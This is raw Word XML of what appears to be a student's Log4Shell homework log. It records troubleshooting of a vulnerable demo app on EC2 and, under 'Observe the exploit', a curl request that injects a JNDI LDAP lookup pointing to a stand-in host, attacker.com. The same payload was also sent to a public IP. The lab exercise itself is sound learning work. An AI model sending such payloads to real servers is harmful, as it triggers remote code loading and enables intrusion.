    <w:p w14:paraId="05C3107D" w14:textId="4B08364A" w:rsidR="001D4D30" w:rsidRPr="009F01AC" w:rsidRDefault="001D4D30"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 xml:space="preserve">entered command: </w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">curl </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="009F01AC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:kern w:val="0"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>http://18.117.114.253:8080/log?message=\${jndi:ldap://attacker.com:1389/a}</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3C8A9B47" w14:textId="7AEF2C87" w:rsidR="001D4D30" w:rsidRPr="009F01AC" w:rsidRDefault="001D4D30"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 xml:space="preserve">Now it is stuck </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FC2A31" w14:textId="77777777" w:rsidR="009E0422" w:rsidRPr="009F01AC" w:rsidRDefault="009E0422" w:rsidP="001D4D3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p>
    <w:p w14:paraId="1D03FDCC" w14:textId="15178954" w:rsidR="001D4D30" w:rsidRPr="009F01AC" w:rsidRDefault="001D4D30" w:rsidP="001D4D3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 xml:space="preserve">Used another terminal to connect </w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>telnet 18.117.114.253</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56869802" w14:textId="6E85A8EB" w:rsidR="001D4D30" w:rsidRPr="009F01AC" w:rsidRDefault="001D4D30" w:rsidP="001D4D3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It was stuck on trying ……..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F751B2B" w14:textId="77777777" w:rsidR="001D4D30" w:rsidRPr="009F01AC" w:rsidRDefault="001D4D30"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p>
    <w:p w14:paraId="57D063C5" w14:textId="0827FE9E" w:rsidR="001D4D30" w:rsidRPr="009F01AC" w:rsidRDefault="009E0422"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S</w:t>
      </w:r>
      <w:r w:rsidR="001D4D30" w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">o on the first terminal I got the below: (venv) [ec2-user@ip-172-31-46-85 log4shell-homework]$ curl "http://18.117.114.253:8080/log?message=\${jndi:ldap://attacker.com:1389/a}" curl: (28) Failed to connect to 18.117.114.253 port 8080 after 133912 ms: Couldn't connect to server </w:t>
      </w:r>
      <w:r w:rsidR="001D4D30" w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D4D30" w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D4D30" w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">On the second terminal that I was using to telnet, I got the below: (venv) [ec2-user@ip-172-31-46-85 log4shell-homework]$ curl "http://18.117.114.253:8080/log?message=\${jndi:ldap://attacker.com:1389/a}" curl: (28) Failed to connect to 18.117.114.253 port 8080 after 133912 ms: Couldn't connect to server </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E185A9A" w14:textId="77777777" w:rsidR="001D4D30" w:rsidRPr="009F01AC" w:rsidRDefault="001D4D30"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p>
    <w:p w14:paraId="19E342A4" w14:textId="3BC64A1B" w:rsidR="001D4D30" w:rsidRPr="009F01AC" w:rsidRDefault="001D4D30"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b/>
          <w:bCs/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Seems like the issue may be that </w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>curl cannot connect to port 8080 on your EC2 instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077B4A51" w14:textId="622C27D4" w:rsidR="001D4D30" w:rsidRPr="009F01AC" w:rsidRDefault="001D4D30"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t xml:space="preserve">I added below to application.properties to enable external connections. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7860433B" w14:textId="77777777" w:rsidR="001D4D30" w:rsidRPr="001D4D30" w:rsidRDefault="001D4D30" w:rsidP="001D4D3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rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D4D30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>server.address=0.0.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4665B2A2" w14:textId="77777777" w:rsidR="009E0422" w:rsidRPr="009F01AC" w:rsidRDefault="001D4D30" w:rsidP="009E04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rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D4D30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>server.port=8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DA4C23" w14:textId="77777777" w:rsidR="009E0422" w:rsidRPr="009F01AC" w:rsidRDefault="009E0422" w:rsidP="009E04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rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ED4E5D6" w14:textId="77777777" w:rsidR="00BF4223" w:rsidRPr="009F01AC" w:rsidRDefault="001D4D30"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rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Still no luck </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00465D28" w14:textId="77777777" w:rsidR="00BF4223" w:rsidRPr="009F01AC" w:rsidRDefault="00002456"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rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>If curl to localhost:8080 immediately fails with "Couldn't connect," it means your app is not running or not listening on port 8080.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45903D5D" w14:textId="77777777" w:rsidR="00BF4223" w:rsidRPr="009F01AC" w:rsidRDefault="00BF4223"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rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F9E4618" w14:textId="77777777" w:rsidR="00BF4223" w:rsidRPr="009F01AC" w:rsidRDefault="00002456"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rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Confirmed file structure </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67794570" w14:textId="77777777" w:rsidR="00BF4223" w:rsidRPr="009F01AC" w:rsidRDefault="00BF4223"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rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62E250D6" w14:textId="77777777" w:rsidR="00BF4223" w:rsidRPr="009F01AC" w:rsidRDefault="002977F0"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rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="00B0F0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LEARNING: </w:t>
      </w:r>
      <w:r w:rsidR="00002456" w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="00B0F0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">However </w:t>
      </w:r>
      <w:r w:rsidR="00002456" w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="00B0F0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">when i do </w:t>
      </w:r>
      <w:r w:rsidR="00002456" w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="00B0F0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="00002456" w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="00B0F0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>find src</w:t>
      </w:r>
      <w:r w:rsidR="00002456" w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="00B0F0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00002456" w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="00B0F0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> it says </w:t>
      </w:r>
      <w:r w:rsidR="00002456" w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="00B0F0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="00002456" w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="00B0F0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>No such file or directory</w:t>
      </w:r>
      <w:r w:rsidR="00002456" w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="00B0F0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">’. </w:t>
      </w:r>
      <w:r w:rsidR="00002456" w:rsidRPr="00002456">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="00B0F0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The error means Maven can't find your Java source code because the </w:t>
      </w:r>
      <w:r w:rsidR="00002456" w:rsidRPr="00002456">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>src folder doesn’t exist or is in the wrong place</w:t>
      </w:r>
      <w:r w:rsidR="00002456" w:rsidRPr="00002456">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="00B0F0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BD5F43" w14:textId="77777777" w:rsidR="00BF4223" w:rsidRPr="009F01AC" w:rsidRDefault="00BF4223"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rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E49F11B" w14:textId="77777777" w:rsidR="00BF4223" w:rsidRPr="009F01AC" w:rsidRDefault="00C12E56"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rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="00B0F0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Looked at file structure all over again – seems like SRC was all caps – could this be the problem??? Changed to src and recreated everything. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D769BD" w14:textId="77777777" w:rsidR="00BF4223" w:rsidRPr="009F01AC" w:rsidRDefault="00BF4223"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rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79521110" w14:textId="77777777" w:rsidR="00BF4223" w:rsidRPr="009F01AC" w:rsidRDefault="00C12E56"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rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mvn clean package</w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> – ran fine </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF1530D" w14:textId="5C1A5595" w:rsidR="00002456" w:rsidRPr="009F01AC" w:rsidRDefault="00C12E56"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rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>java -jar target/log4shell-demo-0.0.1-SNAPSHOT.jar</w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WOW Ran fine!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C32FCCB" w14:textId="6F896FE9" w:rsidR="00C12E56" w:rsidRPr="009F01AC" w:rsidRDefault="00C12E56"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EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06973575" wp14:editId="17D2462E">
            <wp:extent cx="2362200" cy="1167472"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="171016349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63494" name="Picture 1" descr="A screenshot of a computer screen&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2369808" cy="1171232"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A82B96" w14:textId="77777777" w:rsidR="00002456" w:rsidRPr="009F01AC" w:rsidRDefault="00002456" w:rsidP="001D4D3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4EA72E" w:themeColor="accent6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FF4F38A" w14:textId="5C658E25" w:rsidR="009E0422" w:rsidRPr="009F01AC" w:rsidRDefault="00BF4223" w:rsidP="009E04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b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00C12E56" w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FINALLY </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9F03C1" w14:textId="77777777" w:rsidR="00BF4223" w:rsidRPr="009F01AC" w:rsidRDefault="00BF4223" w:rsidP="009E04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b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04C5866F" w14:textId="77777777" w:rsidR="00BF4223" w:rsidRPr="009F01AC" w:rsidRDefault="009E0422" w:rsidP="001D4D30">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Observe the exploit: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163EB186" w14:textId="77777777" w:rsidR="00BF4223" w:rsidRPr="009F01AC" w:rsidRDefault="00C12E56"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b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Now opened a new terminal and tried to connect </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135DB980" w14:textId="77777777" w:rsidR="00BF4223" w:rsidRPr="009F01AC" w:rsidRDefault="00C12E56"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b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Then used the curl command: </w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">curl </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="009F01AC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:kern w:val="0"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>http://localhost:8080/log?message=\${jndi:ldap://attacker.com:1389/a}</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1DC63D29" w14:textId="22C24F02" w:rsidR="00C12E56" w:rsidRPr="009F01AC" w:rsidRDefault="00C12E56"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b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">On second terminal it said this: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC7E80A" w14:textId="77777777" w:rsidR="00BF4223" w:rsidRPr="009F01AC" w:rsidRDefault="00C12E56"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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E9E90AF" wp14:editId="5D7BD66A">
            <wp:extent cx="4082143" cy="491951"/>
